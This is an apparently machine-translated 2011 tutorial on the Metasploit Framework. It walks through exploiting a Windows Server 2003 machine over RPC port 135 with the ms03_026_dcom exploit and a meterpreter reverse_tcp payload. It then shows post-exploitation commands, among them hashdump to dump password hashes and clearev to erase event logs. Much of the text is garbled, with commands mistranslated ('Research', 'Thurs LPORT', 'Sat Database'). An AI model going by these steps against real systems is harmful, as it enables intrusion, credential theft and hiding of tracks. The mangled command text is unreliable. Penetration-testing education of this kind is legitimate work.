Penetration Testing With The Metasploit Framework

23/08/2011 10:13


When you think "penetration testing tool"

first thing that comes to mind is the

Ruby world's largest project, with more than

700 000 lines of code "Metasploit". Not

wonder it has become the de-facto standard for

for penetration testing and vulnerability

development with more than one million

Unique downloads per year, and the world "s

largest database of quality-assured public


Metasploit Framework is a program

and the sub-project, developed by Metasploit

LLC. It was originally established in 2003

Perl programming language, but was then

completely rewritten in Ruby

Programming language. With most

recent release (3.7.1) took Metasploit

the use of testing and simulation of a complete

to the next level, which is a muscled out of high

Prices for commercial counterparts

speeding up and mortality, and Code

advantage of the shortest possible time.

Working with Metasploit

Metasploit is easy to use and is designed to

ease of use in mind to support Penetration

Tester. I'll take you through this

BackTrack show at 5, then go for it

download if not already done so -


org / downloads /. The reason for using

BackTrack 5 is because it has the right

Ruby libraries.

Metasploit Framework has three work

msfconsole environments, msfcli

interface and the interface msfweb.

However, the main and most

Workspace favorite is the "msfconsole." There

a powerful command line interface, which is

its own set of commands and the environment


Before you used to run, it is useful

understand what some Metasploit

commands do. Some of

used commands. Graphic

a description of their outputs should

provided that we use while

some of the boxes in the next part of this article.

i) Research <keyword> : Enter the

command "find" with the

lists the various keywords

exploits that have the potential

Keyword model.

ii) benefit show: Writing

"Show exploits" on the order lists

exploits currently available.

Is to use a different remote

platforms and applications, including

Windows, Linux, IIS, Apache, etc.

one that will test the flexibility

and understand how


iii) show load: With the same "show"

command, you can also list

payloads available. We can use a

"The charges show 'from the list of charges.

iv) shows the possibilities: to write

Show View Options command displays

You options you have defined and

Perhaps those who may have

He forgot to specify. Each operation and

Payload comes with its own possibilities

can be defined.

v) info <type><name> : If you want to

specific information about an exploit or

payload, you can use the 'info'

control. Let 's say we want

Info full load

"Winbind". We can use the

"Winbind support Info '.

vi) use <exploit_name> This command

Metasploit exploit words with

with the specified name.

vii) to rhosts <hostname_or_ip> :

This order indicates

Metasploit defined objective

remote host.

viii) to RPORT <host_port> This

command specifies the port

Metasploit will connect

remote host.

ix) Insert the payload

<generic/shell_bind_tcp> This

command sets the payload is

are exploited to give the target

shell, when the service is


x) Thurs LPORT <local_port> This

command sets the port number

payload on the server opens

when an exploit is executed. There

important that this port is

port can be opened in

Server (EIT are not used by another

service and not reserved for

administrative purposes), so set

random 4-digit number above

1024, and you should be fine. You "ll

have to change the number of each

Once successfully exploit

service as well.

xi) to take advantage: In fact, use the service.

Another version of the exploit, rexploit

Recharge your exploit code and

makes use. This gives you

experiment with small changes to exploit

Code without having to restart the console.

xii) to help: "help" command to give

basic information of all

commands that are not listed


Now you are ready for any base

Commands must start at their own convenience,

Let 's get to choose a couple of scenarios

remotely control the machine.


Victim's computer: -

Operating System: Microsoft Windows Server 2003


Striker (Our) machine: -

OS: BackTrack 5

Kernel version: Linux 2.6.38 # 1 SMP BT

Thursday, March 17, 2011 8:52:18 PM EDT i686

GNU / Linux

Metasploit Version: Built in version

Metasploit 3.8.0-dev


Metasploit Version: Built in version

Metasploit 3.8.0-dev


Objective: -

The only information we have about

the remote server is that Windows

Server 2003, and the aim is to get

Shell access to server.

The detailed steps:

Step 1:

An analysis of nmap on the remote server

Starting Nmap scan will show us

range of open ports.

Step 2:

In your copy of BackTrack, go to:

Application - BackTrack - Exploitation

Tools - network operations

Msfconsole Metasploit Framework

During initialization, msfconsole,

standard checks performed. If

all is well.

Step 3:

We now know that port 135 is open,

Search for an exploit related to RPC

Metasploit. To list all the advantages of

Show supports the use Metasploit '

exploits "command. This achievement shows all

currently available exploits.

As you may have noticed, the default

installation of the Metasploit Framework

3.8.0-dev comes with 696 exploits, 224

payload, which is quite impressive

warehouse to find a special benefit from

this great list would be a daunting task proportions.

So we use the best option. You can connect or another

alternative is to use research "

<keyword> "The command is Metasploit

for weaknesses related to the PRC.

In type msfconsole "DCERPC Search" to

Find all achievements related DCERPC

keywords that exploits can be used to gain

access to a vulnerable server port

135. List of all the associated benefits would be

msfconsole window.

Step 4:

Now that is the list of RPC vulnerabilities

in front of you, we would need more

information about the vulnerability before

actually use it. For more information

You can use the advantage of

command "Info


DCOM "providing information, such as

destinations available, usage requirements,

details of the vulnerability itself, and also

references where you can find more


Step 5:

The command "use <exploit_name> "

active exploit the environment for

exploit <exploit_name> . In our case, we

use the "use


DCOM "for our exploit.


DCOM "system changes

"MSF-&gt;" and "The MSF

exploit (ms03_026_dcom)&gt; "which

symbolizes the fact that we have entered a

Temporary operating environment.

Step 6:

Now, we have decided to use towards the

need for the current situation. "Show

options "command shows different

parameters required to

exploit to function properly. In our case,

RPORT is already set to 135 and only

opportunity to be together is that you can set rhost

using the "set rhost" command.

We will give "rhost command in September "and we see that rhosts

is set to

Step 7:

The only step left now, before we

Use set to launch a payload for the

used. We can look at all available

the payload using the "see charges"


In this case, we use the inverse tcp

meterpreter that can be set

command "Set the payload

Windows / Meterpreter / reverse_tcp "

that generates a shell, if the remote server is

successfully exploited. Now, again, it is necessary

display the available options using the show "

options "to ensure that all mandatory

parts are properly filled, so that

benefit from starting correctly.

We note that the payload is LHOST

has not been resolved, so we started saying local IP. "set of commands


Step 8:

Now everything is ready and exploitation

is properly configured, it is time to

start operating.

Use the "check" command to check

if the victim's computer is vulnerable to

the advantage or not. This option is not present

for all operators, but can be a real good

support system before you use the

the remote server to ensure the remote control

server is not patched against the exploitation

undermine it.

In this case, our exploit is not compatible with the selected

control option.

Command "Leverage" actually begins in

attack, do what you must do to

the load has been executed on the remote



successfully executed against the distance

the machine due to

vulnerable port 135 This can be seen

instead ask for "Meterpreter&gt;".

Step 9:

Now is an inverse relationship

configuration between the victim and our machine

have full control of the server. Us

can use "help" command to see what all

commands can be used by us in the remote control

server to perform related actions.

Below is the result of some of

Meterpreter orders: -

 "ipconfig" transcripts remote

machines of all current TCP / IP

the network settings

 "getuid" print server ID
its console.

 "hashdump" dumps the contents of

Sat Database

 "clearev" can be used to remove all

tracks that have never been


We have successfully used Metasploit

Remote connection to break

Windows 2003 Server, and get a shell

that can be controlled remotely

machine and perform any

activities according to our desires.

The potential uses Metasploit


1) Metasploit can be used to

penetration testing to confirm the reports of

other automated vulnerability assessment

tools to prove that the vulnerability is not a

false positives and can be used. Particular care has

faced not only because it refutes

false positives, but it can also break things.

2) Metasploit can be used to test new

feats that occur almost every day

Their local host test servers

understand the effectiveness of the exploit.

3) The Metasploit is also a great test

Their intrusion detection systems to test

if the IDS is successful in preventing

attacks that we ignore it.